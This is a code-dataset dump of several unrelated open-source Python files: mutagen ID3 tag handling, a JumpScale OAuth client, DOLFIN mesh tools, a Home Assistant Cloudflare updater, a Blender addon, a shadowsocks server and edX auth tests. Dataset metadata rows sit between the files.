f = filething.fileobj
try:
header = ID3Header(filething.fileobj)
except ID3NoHeaderError:
old_size = 0
else:
old_size = header.size
data = self._prepare_data(f, 0, old_size, v2_version, v23_sep, padding)
new_size = len(data)
if old_size < new_size:
insert_bytes(f, new_size - old_size, old_size)
elif old_size > new_size:
delete_bytes(f, old_size - new_size, new_size)
f.seek(0)
f.write(data)
self.__save_v1(f, v1)
def __save_v1(self, f, v1):
tag, offset = find_id3v1(f)
has_v1 = tag is not None
f.seek(offset, 2)
if v1 == ID3v1SaveOptions.UPDATE and has_v1 or v1 == ID3v1SaveOptions.CREATE:
f.write(MakeID3v1(self))
else:
f.truncate()
@loadfile(writable=True)
def delete(self, filething=None, delete_v1=True, delete_v2=True):
"""delete(filething=None, delete_v1=True, delete_v2=True)
Remove tags from a file.
Args:
filething (filething): A filename or `None` to use the one used
when loading.
delete_v1 (bool): delete any ID3v1 tag
delete_v2 (bool): delete any ID3v2 tag
If no filename is given, the one most recently loaded is used.
"""
delete(filething, delete_v1, delete_v2)
self.clear()
@convert_error(IOError, error)
@loadfile(method=False, writable=True)
def delete(filething, delete_v1=True, delete_v2=True):
"""Remove tags from a file.
Args:
delete_v1 (bool): delete any ID3v1 tag
delete_v2 (bool): delete any ID3v2 tag
Raises:
mutagen.MutagenError: In case deleting failed
"""
f = filething.fileobj
if delete_v1:
tag, offset = find_id3v1(f)
if tag is not None:
f.seek(offset, 2)
f.truncate()
# technically an insize=0 tag is invalid, but we delete it anyway
# (primarily because we used to write it)
if delete_v2:
f.seek(0, 0)
idata = f.read(10)
try:
id3, vmaj, vrev, flags, insize = struct.unpack(">3sBBB4s", idata)
except struct.error:
pass
else:
insize = BitPaddedInt(insize)
if id3 == b"ID3" and insize >= 0:
delete_bytes(f, insize + 10, 0)
class ID3FileType(mutagen.FileType):
"""ID3FileType(filething, ID3=None, **kwargs)
An unknown type of file with ID3 tags.
Args:
filething (filething): A filename or file-like object
ID3 (ID3): An ID3 subclass to use for tags.
Raises:
mutagen.MutagenError: In case loading the file failed
Load stream and tag information from a file.
A custom tag reader may be used in instead of the default
mutagen.id3.ID3 object, e.g. an EasyID3 reader.
"""
__module__ = "mutagen.id3"
ID3 = ID3
class _Info(mutagen.StreamInfo):
length = 0
def __init__(self, fileobj, offset):
pass
@staticmethod
def pprint():
return u"Unknown format with ID3 tag"
@staticmethod
def score(filename, fileobj, header_data):
return header_data.startswith(b"ID3")
def add_tags(self, ID3=None):
"""Add an empty ID3 tag to the file.
Args:
ID3 (ID3): An ID3 subclass to use or `None` to use the one
that used when loading.
A custom tag reader may be used in instead of the default
`ID3` object, e.g. an `mutagen.easyid3.EasyID3` reader.
"""
if ID3 is None:
ID3 = self.ID3
if self.tags is None:
self.ID3 = ID3
self.tags = ID3()
else:
raise error("an ID3 tag already exists")
@loadfile()
def load(self, filething, ID3=None, **kwargs):
# see __init__ for docs
fileobj = filething.fileobj
if ID3 is None:
ID3 = self.ID3
else:
# If this was initialized with EasyID3, remember that for
# when tags are auto-instantiated in add_tags.
self.ID3 = ID3
try:
self.tags = ID3(fileobj, **kwargs)
except ID3NoHeaderError:
self.tags = None
if self.tags is not None:
try:
offset = self.tags.size
except AttributeError:
offset = None
else:
offset = None
self.info = self._Info(fileobj, offset)
| gpl-3.0 | -1,115,696,369,756,836,000 | 28.075472 | 86 | 0.566029 | false |
Jumpscale/jumpscale_core8 | lib/JumpScale/clients/oauth/OauthInstance.py | 1 | 5063 | import urllib.request
import urllib.parse
import urllib.error
import string
import requests
import time
import random
from JumpScale import j
class AuthError(Exception):
pass
class UserInfo(object):
def __init__(self, username, emailaddress, groups):
self.username = username
self.emailaddress = emailaddress
self.groups = groups
class OauthInstance:
def __init__(self, addr, accesstokenaddr, id, secret, scope, redirect_url, user_info_url, logout_url, instance):
if not addr:
hrd = j.application.getAppInstanceHRD('oauth_client', instance)
self.addr = hrd.get('instance.oauth.client.url')
self.accesstokenaddress = hrd.get('instance.oauth.client.url2')
self.id = hrd.get('instance.oauth.client.id')
self.scope = hrd.get('instance.oauth.client.scope')
self.redirect_url = hrd.get('instance.oauth.client.redirect_url')
self.secret = hrd.get('instance.oauth.client.secret')
self.user_info_url = hrd.get('instance.oauth.client.user_info_url')
self.logout_url = hrd.get('instance.oauth.client.logout_url')
else:
self.addr = addr
self.id = id
self.scope = scope
self.redirect_url = redirect_url
self.accesstokenaddress = accesstokenaddr
self.secret = secret
self.user_info_url = user_info_url
self.logout_url = logout_url
self.state = ''.join(random.choice(
string.ascii_uppercase + string.digits) for _ in range(30))
@property
def url(self):
params = {'client_id': self.id, 'redirect_uri': self.redirect_url,
'state': self.state, 'response_type': 'code'}
if self.scope:
params.update({'scope': self.scope})
return '%s?%s' % (self.addr, urllib.parse.urlencode(params))
def getAccessToken(self, code, state):
payload = {'code': code, 'client_id': self.id, 'client_secret': self.secret,
'redirect_uri': self.redirect_url, 'grant_type': 'authorization_code',
'state': state}
result = requests.post(self.accesstokenaddress, data=payload, headers={
'Accept': 'application/json'})
if not result.ok or 'error' in result.json():
msg = result.json()['error']
j.logger.log(msg)
raise AuthError(msg)
return result.json()
def getUserInfo(self, accesstoken):
params = {'access_token': accesstoken['access_token']}
userinforesp = requests.get(self.user_info_url, params=params)
if not userinforesp.ok:
msg = 'Failed to get user details'
j.logger.log(msg)
raise AuthError(msg)
userinfo = userinforesp.json()
return UserInfo(userinfo['login'], userinfo['email'], ['user'])
class ItsYouOnline(OauthInstance):
def getAccessToken(self, code, state):
import jose
import jose.jwt
scope = self.scope + ',offline_access'
organization = j.portal.server.active.cfg['organization']
payload = {'code': code, 'client_id': self.id, 'client_secret': self.secret,
'redirect_uri': self.redirect_url, 'grant_type': '', 'scope': scope,
'response_type': 'id_token', 'state': state, 'aud': organization}
result = requests.post(self.accesstokenaddress, data=payload, headers={
'Accept': 'application/json'})
if not result.ok:
msg = result.text
j.logger.log(msg)
raise AuthError(msg)
token = result.json()
# convert jwt expire time to oauth2 token expire time
jwtdata = jose.jwt.get_unverified_claims(token['access_token'])
token['expires_in'] = jwtdata['exp'] - time.time()
return token
def getUserInfo(self, accesstoken):
import jose
import jose.jwt
jwt = accesstoken['access_token']
headers = {'Authorization': 'bearer %s' % jwt}
jwtdata = jose.jwt.get_unverified_claims(jwt)
scopes = jwtdata['scope']
requestedscopes = set(self.scope.split(','))
if set(jwtdata['scope']).intersection(requestedscopes) != requestedscopes:
msg = 'Failed to get the requested scope for %s' % self.client.id
raise AuthError(msg)
username = jwtdata['username']
userinfourl = self.user_info_url.rstrip('/') + "/%s/info" % username
userinforesp = requests.get(userinfourl, headers=headers)
if not userinforesp.ok:
msg = 'Failed to get user details'
raise AuthError(msg)
groups = ['user']
for scope in scopes:
parts = scope.split(':')
if len(parts) == 3 and parts[:2] == ['user', 'memberof']:
groups.append(parts[-1].split('.')[-1])
userinfo = userinforesp.json()
return UserInfo(userinfo['username'], userinfo['emailaddresses'][0]['emailaddress'], groups)
| apache-2.0 | -8,568,296,709,341,277,000 | 37.067669 | 116 | 0.598064 | false |
MelanieBittl/dolfin | site-packages/dolfin/mesh/boundarysubdomainfinder.py | 3 | 5586 | # Copyright (C) 2008 Kent-Andre Mardal
#
# This file is part of DOLFIN.
#
# DOLFIN is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# DOLFIN is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with DOLFIN. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
import sys
import getopt
import six
from dolfin import *
import numpy
import operator
from functools import reduce
def create_maps(boundary_mesh):
"""
Create mappings between vertices and cells on the boundary mesh
"""
c2v = {}
v2c = {}
for cell in cells(boundary_mesh):
for vertex in vertices(cell):
v = vertex.index()
c = cell.index()
if c in c2v:
c2v[c].append(v)
else:
c2v[c] = [v]
if v in v2c:
v2c[v].append(c)
else:
v2c[v] = [c]
return v2c, c2v
def find_subdomain(start_vertex, v2c, c2v):
"""
Find all cells connected with the start_vertex
"""
next = c2v[v2c[start_vertex][0]][1]
done = False
previous_vertex = start_vertex
previous_cell = v2c[start_vertex][0]
subdomain = {}
while not done:
c0, c1 = v2c[previous_vertex]
if c0 == previous_cell:
next_cell = c1
elif c1 == previous_cell:
next_cell = c0
else:
print("None of the vertices were the previous vertex ??")
v0, v1 = c2v[next_cell]
if v0 == previous_vertex:
next_vertex = v1
elif v1 == previous_vertex:
next_vertex = v0
else:
print("None of the vertices were the previous vertex ??")
if next_cell in subdomain:
done = True
else:
subdomain[next_cell] = True
previous_vertex = next_vertex
previous_cell = next_cell
return subdomain
def find_new_cell_key(c2v, keys):
"""
Find new cell.
"""
done = False
iter = list(c2v.keys()).__iter__()
while not done:
key = six.advance_iterator(iter)
if key in keys:
pass
else:
done = True
return key
def write_file(outfilename, mesh, subdomains):
str = """<?xml version="1.0" encoding="UTF-8"?>
<dolfin xmlns:dolfin="http://fenicsproject.org">
<meshfunction type="uint" dim="1" size="%d">
""" % mesh.numFacets()
for key in list(subdomains.keys()):
str += "\n <entity index=\"%d\" value=\"%d\"/>" % (key, subdomains[key])
str += """
</meshfunction>
</dolfin>
"""
f = open(outfilename, 'w')
f.write(str)
f.close()
def find_keys_on_one_subdomain(c2v, v2c, all_keys):
try:
flat_keys = []
if len(all_keys) > 0:
flat_keys = reduce(operator.add, all_keys)
new_cell_key = find_new_cell_key(c2v, flat_keys)
vertex_key = c2v[new_cell_key][0]
subdomain = find_subdomain(vertex_key, v2c, c2v)
new_keys = list(subdomain.keys());
new_keys.sort()
all_keys.append(new_keys)
return all_keys
except Exception as e:
# print "done with finding the subdomains"
pass
def find_all_subdomains(ifilename, ofilename):
mesh = Mesh(ifilename)
if mesh.geometry().dim() != 2:
print("This script does only work in 2D.")
print("(It should be possible to extend to 3D, though)")
exit(2)
boundary_mesh = BoundaryMesh(mesh)
boundary_cell_map = boundary_mesh.data().meshFunction("cell map")
v2c, c2v = create_maps(boundary_mesh)
done = False
keys = []
subdomains = {}
all_keys = []
prev_keys = []
while not done:
new_keys = find_keys_on_one_subdomain(c2v, v2c, prev_keys)
if new_keys == None:
done = True
all_keys = prev_keys
else:
prev_keys = new_keys
for i in range(0, mesh.numFacets()):
subdomains[i] = len(all_keys)
counter = 0
for keys in all_keys:
for key in keys:
subdomains[boundary_cell_map.array()[key]] = counter
counter+=1
write_file(ofilename, mesh, subdomains)
def usage():
"Display usage"
print("""\
Usage: dolfin-convert [OPTIONS] ... input.x output.y
Options:
-h display this help text and exit
-i specify input file
-o specify output file
Alternatively, the following long options may be used:
--help same as -h
--input same as -i
--output same as -o
""")
def main(argv):
"Main function"
# Get command-line arguments
try:
opts, args = getopt.getopt(argv, "hi:o:", ["help", "input=", "output="])
except getopt.GetoptError:
usage()
sys.exit(2)
ifilename = None
ofilename = None
for opt, arg in opts:
if opt in ("-i", "--infile"):
ifilename = arg
elif opt in ("-o", "--outfile"):
ofilename = arg
else:
print("Option not recoginized")
find_all_subdomains(ifilename, ofilename)
if __name__ == '__main__':
main(sys.argv[1:])
| gpl-3.0 | -5,786,090,352,813,916,000 | 23.716814 | 84 | 0.57662 | false |
auduny/home-assistant | homeassistant/components/cloudflare/__init__.py | 7 | 2188 | """Update the IP addresses of your Cloudflare DNS records."""
from datetime import timedelta
import logging
import voluptuous as vol
from homeassistant.const import CONF_API_KEY, CONF_EMAIL, CONF_ZONE
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.event import track_time_interval
_LOGGER = logging.getLogger(__name__)
CONF_RECORDS = 'records'
DOMAIN = 'cloudflare'
INTERVAL = timedelta(minutes=60)
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_EMAIL): cv.string,
vol.Required(CONF_API_KEY): cv.string,
vol.Required(CONF_ZONE): cv.string,
vol.Required(CONF_RECORDS): vol.All(cv.ensure_list, [cv.string]),
})
}, extra=vol.ALLOW_EXTRA)
def setup(hass, config):
"""Set up the Cloudflare component."""
from pycfdns import CloudflareUpdater
cfupdate = CloudflareUpdater()
email = config[DOMAIN][CONF_EMAIL]
key = config[DOMAIN][CONF_API_KEY]
zone = config[DOMAIN][CONF_ZONE]
records = config[DOMAIN][CONF_RECORDS]
def update_records_interval(now):
"""Set up recurring update."""
_update_cloudflare(cfupdate, email, key, zone, records)
def update_records_service(now):
"""Set up service for manual trigger."""
_update_cloudflare(cfupdate, email, key, zone, records)
track_time_interval(hass, update_records_interval, INTERVAL)
hass.services.register(
DOMAIN, 'update_records', update_records_service)
return True
def _update_cloudflare(cfupdate, email, key, zone, records):
"""Update DNS records for a given zone."""
_LOGGER.debug("Starting update for zone %s", zone)
headers = cfupdate.set_header(email, key)
_LOGGER.debug("Header data defined as: %s", headers)
zoneid = cfupdate.get_zoneID(headers, zone)
_LOGGER.debug("Zone ID is set to: %s", zoneid)
update_records = cfupdate.get_recordInfo(headers, zoneid, zone, records)
_LOGGER.debug("Records: %s", update_records)
result = cfupdate.update_records(headers, zoneid, update_records)
_LOGGER.debug("Update for zone %s is complete", zone)
if result is not True:
_LOGGER.warning(result)
| apache-2.0 | -4,421,321,578,304,429,600 | 30.257143 | 76 | 0.691042 | false |
PLyczkowski/Sticky-Keymap | 2.74/scripts/addons_contrib/sequencer_tools/__init__.py | 2 | 4298 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
bl_info = {
"name": "Sequencer Tools",
"author": "mont29",
"version": (0, 0, 2),
"blender": (2, 66, 0),
"location": "Sequencer menus/UI",
"description": "Various Sequencer tools.",
"warning": "",
"wiki_url": "http://wiki.blender.org/index.php/Extensions:2.6/Py/"
"Scripts/Sequencer/Tools",
"tracker_url": "https://developer.blender.org/T31549",
"support": 'TESTING',
"category": "Sequencer",
}
if "bpy" in locals():
import imp
imp.reload(export_strips)
else:
import bpy
from . import export_strips
KEYMAPS = (
# First, keymap identifiers (last bool is True for modal km).
(("Sequencer", "WINDOW", "SEQUENCE_EDITOR", False), (
# Then a tuple of keymap items, defined by a dict of kwargs for the km new func, and a tuple of tuples (name, val)
# for ops properties, if needing non-default values.
({"idname": export_strips.SEQExportStrip.bl_idname, "type": "P", "value": "PRESS", "shift": True, "ctrl": True},
()),
)),
)
def menu_func(self, context):
self.layout.operator(export_strips.SEQExportStrip.bl_idname, text="Export Selected")
def find_keymap_items(km, idname):
return (i for i in km.keymap_items if i.idname == idname)
def update_keymap(activate):
# Add.
if activate:
kconf = bpy.context.window_manager.keyconfigs.addon
if not kconf:
return # happens in background mode...
for km_info, km_items in KEYMAPS:
km_name, km_regtype, km_sptype, km_ismodal = km_info
kmap = [k for k in kconf.keymaps
if k.name == km_name and k.region_type == km_regtype and
k.space_type == km_sptype and k.is_modal == km_ismodal]
if kmap:
kmap = kmap[0]
else:
kmap = kconf.keymaps.new(km_name, region_type=km_regtype, space_type=km_sptype, modal=km_ismodal)
for kmi_kwargs, props in km_items:
kmi = kmap.keymap_items.new(**kmi_kwargs)
kmi.active = True
for prop, val in props:
setattr(kmi.properties, prop, val)
# Remove.
else:
# XXX We must also clean up user keyconfig, else, if user has customized one of our shortcut, this
# customization remains in memory, and comes back when re-enabling the addon, causing a segfault... :/
kconfs = bpy.context.window_manager.keyconfigs
for kconf in (kconfs.user, kconfs.addon):
for km_info, km_items in KEYMAPS:
km_name, km_regtype, km_sptype, km_ismodal = km_info
kmaps = (k for k in kconf.keymaps
if k.name == km_name and k.region_type == km_regtype and
k.space_type == km_sptype and k.is_modal == km_ismodal)
for kmap in kmaps:
for kmi_kwargs, props in km_items:
for kmi in find_keymap_items(kmap, kmi_kwargs["idname"]):
kmap.keymap_items.remove(kmi)
# XXX We won’t remove addons keymaps themselves, other addons might also use them!
def register():
bpy.utils.register_module(__name__)
bpy.types.SEQUENCER_MT_strip.append(menu_func)
update_keymap(True)
def unregister():
update_keymap(False)
bpy.types.SEQUENCER_MT_strip.remove(menu_func)
bpy.utils.unregister_module(__name__)
if __name__ == "__main__":
register()
| gpl-2.0 | 3,772,550,606,359,670,300 | 36.684211 | 120 | 0.610568 | false |
linkerlin/shadowsocks-server | sserver.py | 2 | 10464 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2014 clowwindy
# Copyright (c) 2014 v3aqb
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import with_statement
__version__ = '1.0.0'
import sys
if sys.version_info < (2, 6):
import simplejson as json
else:
import json
try:
import gevent
import gevent.monkey
gevent.monkey.patch_all(dns=gevent.version_info[0] >= 1)
except ImportError:
gevent = None
print >>sys.stderr, 'warning: gevent not found, using threading instead'
import errno
import socket
import thread
import threading
import SocketServer
import struct
import logging
import getopt
import encrypt
import os
import urlparse
from util import create_connection, getaddrinfo, parse_hostport, get_ip_address
def send_all(sock, data):
bytes_sent = 0
while True:
r = sock.send(data[bytes_sent:])
if r < 0:
return r
bytes_sent += r
if bytes_sent == len(data):
return bytes_sent
class ShadowsocksServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
allow_reuse_address = True
def __init__(self, serverinfo, RequestHandlerClass, bind_and_activate=True):
self.serverinfo = serverinfo
p = urlparse.urlparse(serverinfo)
encrypt.check(p.password, p.username)
self.key, self.method = p.password, p.username
self.aports = [int(k) for k in urlparse.parse_qs(p.query).get('ports', [''])[0].split(',') if k.isdigit()]
reverse = urlparse.parse_qs(p.query).get('reverse', [''])[0]
self.reverse = parse_hostport(reverse) if reverse else None
addrs = getaddrinfo(p.hostname, p.port)
if not addrs:
raise ValueError('cant resolve listen address')
self.address_family = addrs[0][0]
server_address = (p.hostname, p.port)
SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate=bind_and_activate)
def server_activate(self):
self.socket.listen(self.request_queue_size)
class Socks5Server(SocketServer.StreamRequestHandler):
timeout = 20
bufsize = 8192
def handle_tcp(self, local, remote, timeout=60):
def _io_copy(dest, source, timeout, cipher):
try:
dest.settimeout(timeout)
source.settimeout(timeout)
while 1:
data = source.recv(self.bufsize)
if not data:
break
dest.sendall(cipher(data))
except socket.timeout:
pass
except (IOError, OSError) as e:
if e.args[0] not in (errno.ECONNABORTED, errno.ECONNRESET, errno.ENOTCONN, errno.EPIPE):
raise
if e.args[0] in (errno.EBADF,):
return
finally:
for sock in (dest, source):
try:
sock.close()
except (IOError, OSError):
pass
thread.start_new_thread(_io_copy, (remote.dup(), local.dup(), timeout, self.decrypt))
_io_copy(local, remote, timeout, self.encrypt)
def encrypt(self, data):
return self.encryptor.encrypt(data)
def decrypt(self, data):
return self.encryptor.decrypt(data)
def _request_is_loopback(self, req):
try:
return get_ip_address(req[0]).is_loopback
except Exception:
pass
def handle(self):
self.remote = None
try:
self.encryptor = encrypt.Encryptor(self.server.key, self.server.method, servermode=True)
sock = self.connection
# sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
iv_len = self.encryptor.iv_len()
if iv_len:
try:
self.decrypt(self.rfile.read(iv_len))
except ValueError:
logging.warn('server %s:%d iv reused, possible replay attrack. closing...' % self.server.server_address)
return
data = sock.recv(1)
if not data:
return
addrtype = ord(self.decrypt(data))
if addrtype == 1:
addr = socket.inet_ntoa(self.decrypt(self.rfile.read(4)))
elif addrtype == 3:
addr = self.decrypt(self.rfile.read(ord(self.decrypt(self.rfile.read(1)))))
elif addrtype == 4:
addr = socket.inet_ntop(socket.AF_INET6, self.decrypt(self.rfile.read(16)))
else: # not supported
logging.warn('server %s:%d addr_type not supported, maybe wrong password' % self.server.server_address)
return
port = struct.unpack('>H', self.decrypt(self.rfile.read(2)))[0]
if self.server.aports and port not in self.server.aports:
logging.info('server %s:%d port %d not allowed' % (self.server.server_address[0], self.server.server_address[1], port))
return
if self._request_is_loopback((addr, port)):
logging.info('server %s:%d localhost access denied' % self.server.server_address)
return
try:
logging.info('server %s:%d request %s:%d from %s:%d' % (self.server.server_address[0], self.server.server_address[1],
addr, port, self.client_address[0], self.client_address[1]))
data = self.decrypt(sock.recv(self.bufsize))
if self.server.reverse:
if data.startswith((b'GET', b'POST', b'HEAD', b'PUT', b'DELETE', b'TRACE', b'OPTIONS', b'PATCH', b'CONNECT')) and b'HTTP/1' in data and b'\r\n' in data:
data = data.decode('latin1')
data = data.replace('\r\n', '\r\nss-realip: %s:%s\r\nss-client: %s\r\n' % (self.client_address[0], self.client_address[1], self.server.key), 1)
self.remote = create_connection(self.server.reverse, timeout=10)
else:
a = 'CONNECT %s:%d HTTP/1.0\r\nss-realip: %s:%s\r\nss-client: %s\r\n\r\n' % (addr, port, self.client_address[0], self.client_address[1], self.server.key)
self.remote = create_connection(self.server.reverse, timeout=10)
self.remote.sendall(a.encode('latin1'))
remoterfile = self.remote.makefile('rb', 0)
d = remoterfile.readline()
while d not in (b'\r\n', b'\n', b'\r'):
if not d:
raise IOError(0, 'remote closed')
d = remoterfile.readline()
if not self.remote:
self.remote = create_connection((addr, port), timeout=10)
self.remote.sendall(data)
# self.remote.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
except (IOError, OSError) as e: # Connection refused
logging.warn('server %s:%d %r on connecting %s:%d' % (self.server.server_address[0], self.server.server_address[1], e, addr, port))
return
self.handle_tcp(sock, self.remote)
except socket.error as e:
logging.warn('server %s:%d %r' % (self.server.server_address[0], self.server.server_address[1], e))
def finish(self):
SocketServer.StreamRequestHandler.finish(self)
if self.remote:
self.remote.close()
def start_servers(config):
for serverinfo in config:
try:
logging.info('starting server: %s' % serverinfo)
ssserver = ShadowsocksServer(serverinfo, Socks5Server)
threading.Thread(target=ssserver.serve_forever).start()
except Exception as e:
logging.error('something wrong with config: %r' % e)
def main():
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S', filemode='a+')
hello = 'shadowsocks-server %s' % __version__
if gevent:
hello += ' with gevent %s' % gevent.__version__
print(hello)
print('by v3aqb')
config_path = None
server = None
if os.path.exists(os.path.join(os.path.dirname(__file__), 'config.json')):
config_path = os.path.join(os.path.dirname(__file__), 'config.json')
try:
optlist, args = getopt.getopt(sys.argv[1:], 'c:f:')
for key, value in optlist:
if key == '-f':
config_path = value
if key == '-c':
server = value
if server:
config = [server]
elif config_path:
logging.info('loading config from %s' % config_path)
with open(config_path, 'rb') as f:
try:
config = json.load(f)
except ValueError as e:
logging.error('found an error in config.json: %s', e.message)
sys.exit(1)
else:
config = ['ss://aes-256-cfb:[email protected]:8388', ]
except getopt.GetoptError:
sys.exit(2)
start_servers(config)
if __name__ == '__main__':
try:
main()
except socket.error as e:
logging.error(e)
except KeyboardInterrupt:
sys.exit(0)
| mit | 5,911,844,524,637,377,000 | 38.787072 | 177 | 0.578842 | false |
Lektorium-LLC/edx-platform | common/djangoapps/third_party_auth/tests/specs/base.py | 2 | 49399 | """Base integration test for provider implementations."""
import unittest
import json
import mock
from contextlib import contextmanager
from django import test
from django.contrib import auth
from django.contrib.auth import models as auth_models
from django.contrib.messages.storage import fallback
from django.contrib.sessions.backends import cache
from django.core.urlresolvers import reverse
from django.test import utils as django_utils
from django.conf import settings as django_settings
from social_core import actions, exceptions
from social_django import utils as social_utils
from social_django import views as social_views
from lms.djangoapps.commerce.tests import TEST_API_URL
from openedx.core.djangoapps.site_configuration.tests.factories import SiteFactory
from student import models as student_models
from student import views as student_views
from student.tests.factories import UserFactory
from student_account.views import account_settings_context
from third_party_auth import middleware, pipeline
from third_party_auth.tests import testutil
class IntegrationTestMixin(object):
"""
Mixin base class for third_party_auth integration tests.
This class is newer and simpler than the 'IntegrationTest' alternative below, but it is
currently less comprehensive. Some providers are tested with this, others with
IntegrationTest.
"""
# Provider information:
PROVIDER_NAME = "override"
PROVIDER_BACKEND = "override"
PROVIDER_ID = "override"
# Information about the user expected from the provider:
USER_EMAIL = "override"
USER_NAME = "override"
USER_USERNAME = "override"
def setUp(self):
super(IntegrationTestMixin, self).setUp()
self.login_page_url = reverse('signin_user')
self.register_page_url = reverse('register_user')
patcher = testutil.patch_mako_templates()
patcher.start()
self.addCleanup(patcher.stop)
# Override this method in a subclass and enable at least one provider.
def test_register(self, **extra_defaults):
# The user goes to the register page, and sees a button to register with the provider:
provider_register_url = self._check_register_page()
# The user clicks on the Dummy button:
try_login_response = self.client.get(provider_register_url)
# The user should be redirected to the provider's login page:
self.assertEqual(try_login_response.status_code, 302)
provider_response = self.do_provider_login(try_login_response['Location'])
# We should be redirected to the register screen since this account is not linked to an edX account:
self.assertEqual(provider_response.status_code, 302)
self.assertEqual(provider_response['Location'], self.url_prefix + self.register_page_url)
register_response = self.client.get(self.register_page_url)
tpa_context = register_response.context["data"]["third_party_auth"]
self.assertEqual(tpa_context["errorMessage"], None)
# Check that the "You've successfully signed into [PROVIDER_NAME]" message is shown.
self.assertEqual(tpa_context["currentProvider"], self.PROVIDER_NAME)
# Check that the data (e.g. email) from the provider is displayed in the form:
form_data = register_response.context['data']['registration_form_desc']
form_fields = {field['name']: field for field in form_data['fields']}
self.assertEqual(form_fields['email']['defaultValue'], self.USER_EMAIL)
self.assertEqual(form_fields['name']['defaultValue'], self.USER_NAME)
self.assertEqual(form_fields['username']['defaultValue'], self.USER_USERNAME)
for field_name, value in extra_defaults.items():
self.assertEqual(form_fields[field_name]['defaultValue'], value)
registration_values = {
'email': '[email protected]',
'name': 'My Customized Name',
'username': 'new_username',
'honor_code': True,
}
# Now complete the form:
ajax_register_response = self.client.post(
reverse('user_api_registration'),
registration_values
)
self.assertEqual(ajax_register_response.status_code, 200)
# Then the AJAX will finish the third party auth:
continue_response = self.client.get(tpa_context["finishAuthUrl"])
# And we should be redirected to the dashboard:
self.assertEqual(continue_response.status_code, 302)
self.assertEqual(continue_response['Location'], self.url_prefix + reverse('dashboard'))
# Now check that we can login again, whether or not we have yet verified the account:
self.client.logout()
self._test_return_login(user_is_activated=False)
self.client.logout()
self.verify_user_email('[email protected]')
self._test_return_login(user_is_activated=True)
def test_login(self):
self.user = UserFactory.create() # pylint: disable=attribute-defined-outside-init
# The user goes to the login page, and sees a button to login with this provider:
provider_login_url = self._check_login_page()
# The user clicks on the provider's button:
try_login_response = self.client.get(provider_login_url)
# The user should be redirected to the provider's login page:
self.assertEqual(try_login_response.status_code, 302)
complete_response = self.do_provider_login(try_login_response['Location'])
# We should be redirected to the login screen since this account is not linked to an edX account:
self.assertEqual(complete_response.status_code, 302)
self.assertEqual(complete_response['Location'], self.url_prefix + self.login_page_url)
login_response = self.client.get(self.login_page_url)
tpa_context = login_response.context["data"]["third_party_auth"]
self.assertEqual(tpa_context["errorMessage"], None)
# Check that the "You've successfully signed into [PROVIDER_NAME]" message is shown.
self.assertEqual(tpa_context["currentProvider"], self.PROVIDER_NAME)
# Now the user enters their username and password.
# The AJAX on the page will log them in:
ajax_login_response = self.client.post(
reverse('user_api_login_session'),
{'email': self.user.email, 'password': 'test'}
)
self.assertEqual(ajax_login_response.status_code, 200)
# Then the AJAX will finish the third party auth:
continue_response = self.client.get(tpa_context["finishAuthUrl"])
# And we should be redirected to the dashboard:
self.assertEqual(continue_response.status_code, 302)
self.assertEqual(continue_response['Location'], self.url_prefix + reverse('dashboard'))
# Now check that we can login again:
self.client.logout()
self._test_return_login()
def do_provider_login(self, provider_redirect_url):
"""
mock logging in to the provider
Should end with loading self.complete_url, which should be returned
"""
raise NotImplementedError
def _test_return_login(self, user_is_activated=True, previous_session_timed_out=False):
""" Test logging in to an account that is already linked. """
# Make sure we're not logged in:
dashboard_response = self.client.get(reverse('dashboard'))
self.assertEqual(dashboard_response.status_code, 302)
# The user goes to the login page, and sees a button to login with this provider:
provider_login_url = self._check_login_page()
# The user clicks on the provider's login button:
try_login_response = self.client.get(provider_login_url)
# The user should be redirected to the provider:
self.assertEqual(try_login_response.status_code, 302)
login_response = self.do_provider_login(try_login_response['Location'])
# If the previous session was manually logged out, there will be one weird redirect
# required to set the login cookie (it sticks around if the main session times out):
if not previous_session_timed_out:
self.assertEqual(login_response.status_code, 302)
